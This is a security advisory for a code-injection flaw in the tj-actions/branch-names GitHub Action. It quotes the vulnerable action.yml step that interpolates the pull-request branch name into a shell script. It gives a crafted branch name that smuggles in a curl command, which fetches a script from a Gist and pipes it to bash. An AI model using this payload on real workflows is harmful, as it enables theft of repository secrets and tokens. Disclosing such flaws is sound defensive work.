tj-actions/branch-names's Improper Sanitization of Branch Name Leads to Arbitrary Code Injection

Summary

The tj-actions/branch-names GitHub Actions references the github.event.pull_request.head.ref and github.head_ref context variables within a GitHub Actions run step. The head ref variable is the branch name and can be used to execute arbitrary code using a specially crafted branch name.

Details

The vulnerable code is within the action.yml file the run step references the value directly, instead of a sanitized variable.

runs:
  using: "composite"
  steps:
    - id: branch
      run: |
        # "Set branch names..."
        if [[ "${{ github.ref }}" != "refs/tags/"* ]]; then
          BASE_REF=$(printf "%q" "${{ github.event.pull_request.base.ref || github.base_ref }}")
          HEAD_REF=$(printf "%q" "${{ github.event.pull_request.head.ref || github.head_ref }}")
          REF=$(printf "%q" "${{ github.ref }}")

An attacker can use a branch name to inject arbitrary code, for example: Test")${IFS}&&${IFS}{curl,-sSfL,gist.githubusercontent.com/RampagingSloth/72511291630c7f95f0d8ffabb3c80fbf/raw/inject.sh}${IFS}|${IFS}bash&&echo${IFS}$("foo will download and run a script from a Gist. This allows an attacker to inject a payload of arbitrary complexity.

Impact

An attacker can use this vulnerability to steal secrets from or abuse GITHUB_TOKEN permissions.

Reference

https://securitylab.github.com/research/github-actions-untrusted-input

References

jackton1 published to tj-actions/branch-names Dec 4, 2023

Published by the National Vulnerability Database Dec 5, 2023

Published to the GitHub Advisory Database Dec 5, 2023

Reviewed Dec 5, 2023

Last updated Dec 7, 2023

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Package

Affected versions

Patched versions

Description

Summary

Details

Impact

Reference

References

Severity

CVSS base metrics

Weaknesses

CVE ID

GHSA ID

Source code

Credits